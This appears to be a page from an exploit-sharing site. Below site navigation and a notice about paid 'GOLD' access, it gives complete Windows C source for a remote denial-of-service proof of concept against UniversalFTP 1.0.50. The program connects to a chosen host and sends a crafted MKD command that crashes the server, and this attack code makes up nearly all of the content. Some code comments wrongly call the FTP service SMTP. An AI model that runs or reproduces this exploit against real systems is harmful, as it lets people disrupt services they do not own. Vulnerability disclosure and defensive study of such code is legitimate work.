0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit
[==========================================================
UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit
==========================================================
/*
=============================================================
DoS Exploit for UniversalFTP version 1.0.50
=============================================================
UniversalFTP (www.teamtek.net)
http://www.5e5.net/cgi-bin/download3.asp
Suffers from several unhandled user input vulnerabilities that
cause the program to crash.
I originally found this vulnerability on October 27th and wrote
this but got caught up working with the Renasoft PSS Exploit
and forgot to report it.
The vulnerability was posted to secunia by Parvez Anwar November
13th - good job and thanks to him :).
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#define BUFF_SIZE 1024
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
WSADATA wsaData;
char buffer[BUFF_SIZE];
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check, *cmd;
int sockfd, bytes;
int i;
char *hostname;
unsigned short port;
if (argc <= 1)
{
printf("\n==================================================================\n");
printf("UniversalFTP v1.0.50 Denial Of Service PoC Code\n");
printf("Discovered By: Parvez Anwar and Greg Linares (glinares.code
[at ] gmail [dot] com)\n");
printf("Original Reported By: Parvez Anwar\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("default port is 21 \n");
printf("====================================================================\n");
exit(0);
}
cmd = argv[3];
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("21");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending exploit....\n",
hostname, port);
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}
// wait for SMTP service welcome
buf[bytes] = '\0';
check = strstr(buf, "2");
if (check == NULL)
{
printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("%s\n", buf);
char Exploit[] = "MKD \\..\\******\\|\\******";
send(sockfd, Exploit, strlen(Exploit),0);
Sleep(1000);
printf("[*] FTP DoS Packet Sent\n");
closesocket(sockfd);
WSACleanup();
}
# 0day.today [2024-12-26] #